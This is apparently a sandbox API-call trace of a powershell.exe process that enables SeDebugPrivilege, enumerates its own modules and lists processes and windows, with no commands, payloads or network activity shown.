	[0131.674] VerQueryValueW (in: pBlock=0x2ce7d40, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1cd9a8, puLen=0x1cd9a0 | out: lplpBuffer=0x1cd9a8*=0x0, puLen=0x1cd9a0) returned 0
	[0131.674] VerQueryValueW (in: pBlock=0x2ce7d40, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cd978, puLen=0x1cd970 | out: lplpBuffer=0x1cd978*=0x2ce7ddc, puLen=0x1cd970) returned 1
	[0131.675] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0131.676] VerLanguageNameW (in: wLang=0x0, szLang=0x3e4db0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0131.677] CoTaskMemFree (pv=0x3e4db0) 
	[0131.677] VerQueryValueW (in: pBlock=0x2ce7d40, lpSubBlock="\\", lplpBuffer=0x1cd9c8, puLen=0x1cd9c0 | out: lplpBuffer=0x1cd9c8*=0x2ce7d68, puLen=0x1cd9c0) returned 1
	[0131.686] GetCurrentProcessId () returned 0x708
	[0131.805] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1cc8f0 | out: lpLuid=0x1cc8f0*(LowPart=0x14, HighPart=0)) returned 1
	[0131.808] GetCurrentProcess () returned 0xffffffffffffffff
	[0131.809] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1cc910 | out: TokenHandle=0x1cc910*=0x304) returned 1
	[0131.810] AdjustTokenPrivileges (in: TokenHandle=0x304, DisableAllPrivileges=0, NewState=0x2ceb5b8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0131.811] CloseHandle (hObject=0x304) returned 1
	[0131.815] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x708) returned 0x304
	[0131.826] EnumProcessModules (in: hProcess=0x304, lphModule=0x2ceb620, cb=0x200, lpcbNeeded=0x1cd928 | out: lphModule=0x2ceb620, lpcbNeeded=0x1cd928) returned 1
	[0131.828] GetModuleInformation (in: hProcess=0x304, hModule=0x13f600000, lpmodinfo=0x2ceb890, cb=0x18 | out: lpmodinfo=0x2ceb890*(lpBaseOfDll=0x13f600000, SizeOfImage=0x77000, EntryPoint=0x13f60c63c)) returned 1
	[0131.829] CoTaskMemAlloc (cb=0x804) returned 0x3f39f0
	[0131.829] GetModuleBaseNameW (in: hProcess=0x304, hModule=0x13f600000, lpBaseName=0x3f39f0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0131.829] CoTaskMemFree (pv=0x3f39f0) 
	[0131.830] CoTaskMemAlloc (cb=0x804) returned 0x3f39f0
	[0131.830] GetModuleFileNameExW (in: hProcess=0x304, hModule=0x13f600000, lpFilename=0x3f39f0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0131.831] CoTaskMemFree (pv=0x3f39f0) 
	[0131.831] CloseHandle (hObject=0x304) returned 1
	[0131.947] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x708) returned 0x304
	[0131.947] GetExitCodeProcess (in: hProcess=0x304, lpExitCode=0x1cda58 | out: lpExitCode=0x1cda58*=0x103) returned 1
	[0131.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ceb088, Length=0x20000, ResultLength=0x1cda20 | out: SystemInformation=0x12ceb088, ResultLength=0x1cda20*=0x13c70) returned 0x0
	[0131.972] EnumWindows (lpEnumFunc=0x2a666ac, lParam=0x0) returned 1
	[0131.973] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.973] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.973] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.973] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.973] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.973] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.973] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.973] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.973] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.974] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x538
	[0131.974] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.974] GetWindowThreadProcessId (in: hWnd=0x300ee, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.974] GetWindowThreadProcessId (in: hWnd=0x400c0, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.974] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x514
	[0131.974] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.974] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x778
	[0131.974] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x778
	[0131.974] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.974] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x458
	[0131.974] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.975] GetWindowThreadProcessId (in: hWnd=0xa0266, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0xa18
	[0131.975] GetWindowThreadProcessId (in: hWnd=0x14017c, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x978
	[0131.975] GetWindowThreadProcessId (in: hWnd=0x5026a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x838
	[0131.975] GetWindowThreadProcessId (in: hWnd=0x50160, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0xb2c
	[0131.975] GetWindowThreadProcessId (in: hWnd=0x40298, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x8d4
	[0131.975] GetWindowThreadProcessId (in: hWnd=0x4015e, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x874
	[0131.975] GetWindowThreadProcessId (in: hWnd=0x50268, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x9a8
	[0131.975] GetWindowThreadProcessId (in: hWnd=0x60106, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0xb40
	[0131.975] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0xa00
	[0131.975] GetWindowThreadProcessId (in: hWnd=0x900a6, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.975] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.976] GetWindowThreadProcessId (in: hWnd=0x400d0, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.976] GetWindowThreadProcessId (in: hWnd=0x400f0, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.976] GetWindowThreadProcessId (in: hWnd=0x300de, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.976] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.976] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.976] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0131.976] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x9f0
	[0131.976] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x9e0
	[0131.976] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x9d0
	[0131.976] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x9c0
	[0131.976] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x9b0
	[0132.082] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x9a0
	[0132.082] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x990
	[0132.082] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x980
	[0132.083] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x970
	[0132.083] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x960
	[0132.083] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x950
	[0132.083] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x940
	[0132.083] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x930
	[0132.083] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x920
	[0132.083] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x910
	[0132.083] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x900
	[0132.083] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x8f0
	[0132.083] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x8e0
	[0132.084] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x8d0
	[0132.084] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x8c0
	[0132.084] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x8b0
	[0132.084] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x8a0
	[0132.084] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x890
	[0132.084] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x880
	[0132.084] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x870
	[0132.084] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x860
	[0132.084] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x850
	[0132.084] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x840
	[0132.085] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x830
	[0132.085] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x820
	[0132.085] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x810
	[0132.085] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x20c
	[0132.085] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x7c4
	[0132.085] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0xc0
	[0132.085] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x688
	[0132.085] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x6c0
	[0132.085] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x408
	[0132.086] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x7d4
	[0132.086] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x544
	[0132.086] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x540
	[0132.086] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x71c
	[0132.086] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x31c
	[0132.086] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x7ec
	[0132.086] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x5b8
	[0132.086] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x754
	[0132.086] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x664
	[0132.086] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x640
	[0132.087] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x700
	[0132.087] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x410
	[0132.087] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x7a0
	[0132.087] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x3b4
	[0132.087] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x5cc
	[0132.087] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x5d4
	[0132.087] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x7c0
	[0132.087] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x364
	[0132.087] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x240
	[0132.087] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x560
	[0132.087] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x57c
	[0132.088] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x7b0
	[0132.088] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x6a4
	[0132.088] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x32c
	[0132.088] GetWindowThreadProcessId (in: hWnd=0x20164, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x670
	[0132.088] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4f0
	[0132.088] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x514
	[0132.088] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x50c
	[0132.088] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x514
	[0132.088] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x50c
	[0132.088] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x514
	[0132.089] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4f0
	[0132.089] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4f0
	[0132.089] GetWindowThreadProcessId (in: hWnd=0x200a8, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x58c
	[0132.089] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x578
	[0132.089] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x458
	[0132.089] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x530
	[0132.089] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0132.089] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x508
	[0132.089] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0132.090] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4f4
	[0132.090] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0132.090] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0132.090] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x794
	[0132.090] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0132.090] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0132.090] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x458
	[0132.090] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x458
	[0132.090] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x448
	[0132.090] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x778
	[0132.091] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x458
	[0132.091] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x538
	[0132.091] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0132.091] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x4ac
	[0132.091] GetWindowThreadProcessId (in: hWnd=0x30292, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x938
	[0132.091] GetWindowThreadProcessId (in: hWnd=0x30294, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x7c8
	[0132.091] GetWindowThreadProcessId (in: hWnd=0x3028a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0xbdc
	[0132.091] GetWindowThreadProcessId (in: hWnd=0x5026c, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0xbe0
	[0132.091] GetWindowThreadProcessId (in: hWnd=0x6015a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x9f4
	[0132.091] GetWindowThreadProcessId (in: hWnd=0x30296, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x964
	[0132.092] GetWindowThreadProcessId (in: hWnd=0x50116, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x9e8
	[0132.092] GetWindowThreadProcessId (in: hWnd=0x5011c, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x9e8
	[0132.092] GetWindowThreadProcessId (in: hWnd=0x30162, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0xb40
	[0132.092] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0xa00
	[0132.092] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x9f0
	[0132.092] GetWindowThreadProcessId (in: hWnd=0x1025a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x9e0
	[0132.092] GetWindowThreadProcessId (in: hWnd=0x10256, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x9d0
	[0132.092] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x9c0
	[0132.092] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x9b0
	[0132.092] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x9a0
	[0132.092] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x990
	[0132.093] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x980
	[0132.093] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x970
	[0132.093] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x960
	[0132.093] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x950
	[0132.093] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x940
	[0132.093] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x930
	[0132.093] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x920
	[0132.093] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x910
	[0132.093] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x900
	[0132.093] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x8f0
	[0132.094] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x8e0
	[0132.094] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x8d0
	[0132.094] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x8c0
	[0132.094] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x8b0
	[0132.094] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x8a0
	[0132.094] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x890
	[0132.094] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x880
	[0132.094] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x870
	[0132.094] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x860
	[0132.094] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x850
	[0132.094] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x840
	[0132.094] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x830
	[0132.095] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x820
	[0132.095] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x810
	[0132.095] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x20c
	[0132.095] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0x7c4
	[0132.095] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0x1cd780 | out: lpdwProcessId=0x1cd780) returned 0xc0
